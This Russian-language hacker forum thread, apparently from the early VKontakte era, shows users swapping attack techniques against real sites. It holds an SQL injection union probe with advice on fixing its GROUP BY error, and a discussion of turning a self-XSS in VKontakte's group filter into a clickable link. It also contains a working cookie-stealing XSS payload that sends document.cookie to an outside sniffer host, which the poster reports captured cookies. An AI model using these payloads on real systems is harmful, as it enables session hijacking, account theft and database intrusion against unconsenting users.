Там и есть 2 колноки, но при запросе page.php?id=-1'+union+select+1,2/* : Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause
нужно указать группировку по полю (у вас конец запроса обрывается комментариями), т.е. ляляля + group by поле/*
Я не уверен в том что это серьезный баг, вконтакте если зайти в свой аккаунт, раздел "мои группы" - справа вверху форма "фильтр групп". В этой форме выполняется Код формы Собственно вопрос такой: можно ли сформировать ссылку XSS?
2qazer именно это. Исходник действительно большой, да и толку от него маловато. Алерт выскакивает на странице прям в тот момент когда его вставляешь. Там Ajax вроде
тоесть получается прамую ссылку не поставить?алерт выскакивает если его ввести в поле и нажать enter - так тоже катит
Я вот это впринципе и хотел узнать. Скрипт обрабатывается "на ходу". Но ведь обрабатывается и выполняется. Есть ли способ передать скрипт через ссылку в эту форму?
я на самом деле тоже самое хочу узнать))) помоему надо просто узнать название этого поля и подставить его,чтото типо этого -- http://vkontakte.ru/groups.php?название поля=<script>alrtr(/)</script>
Смотрю: олени в теме Вообщем если пашка дуров не поставил: PHP: <?php echo $_GET['имя_поля']; ?> То ничего не сделал, а он действительно не поставил
Хм, я возможно и не шарю, но если я не ошибся тема как раз таки для вопросов по уязвимостям. Так что думаю можно и без оленей обойтись) А здесь можно поподробней? Возможно данные в форму передать каким нибудь образом?
Это уже пофиксено все... думаю надо копать глубже.. и еще всетаки интересно в привате есть сплойты или нет..
всё работает!!!! "><script>img = new Image(); img.src = "http://блаблаблабла?"+document.cookie;</script> и куки на снифе!!! ктонить составьте ссылку
Нашел уязвимость с Ассеsse, пытаюсь авторизоваться по типу: Но выбрасывает на ошибку с Расшифруйте, пожалуйста, что тут не так. если дословно: общая ошибка открытом регистрационном ключе, DNS процесса и бла-бла-ла